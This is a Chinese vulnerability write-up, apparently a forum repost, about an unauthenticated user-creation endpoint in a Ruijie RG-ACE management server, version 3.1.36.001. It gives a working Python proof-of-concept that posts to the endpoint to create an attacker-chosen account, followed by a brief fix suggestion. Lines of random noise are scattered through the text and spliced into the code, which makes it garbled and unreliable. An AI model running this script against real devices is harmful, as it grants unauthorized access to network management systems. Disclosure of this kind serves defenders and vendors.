锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
/ W8 w; A9 ~+ {9 n& u
0 Z* @# w, R$ H1 [6 Y' d
测试的具体版本是
8 y  A0 [5 o2 z5 B  J6 n$ z产品名称: 锐捷应用控制引擎
2 Z( q6 ~* Z$ |" p版本号: 3.1.36.001 TC
0 |, C9 C; m+ O0 N编译时间: 201104291730
4 T, I, U/ A  K

漏洞证明：
0 E. Q1 G5 d: `% F. w7 ^8 a


& _# j- h5 m' _8 @( @8 q$ f


执行脚本
#! /usr/bin/env python
#coding=gbk
& r  A. I9 }4 j: ~' C; Q7 n#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
4 I# X: [2 z. {- W' qpost=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
/ _  w  }3 E6 R; W8 j("userName","t"), #######账号自己加
7 Q- Z: {! I) T( W$ s  {("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
, I" x  F& ^) t: x+ }8 N) z8 O("addr",""),
( L* [! y% \' L2 K" {("submit","确定"))
4 ?" W! e  h# D& Lurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
- \0 `# P9 X2 ^$ k- [( ^
登录，连接设备

; ?$ g1 `+ P) A" M, ]. H* k



默认的管理员admin权限更大点

* P  c, [9 L$ O6 m
$ }- C6 ~' e4 f
) k* U1 `( V6 a

! u% d: U7 j3 ]! w修复方案：
" ]: |% S" o/ P- [0 Q. o# G' G2 E加强对接口的权限验证

  z6 I; b; l: d$ \& c4 g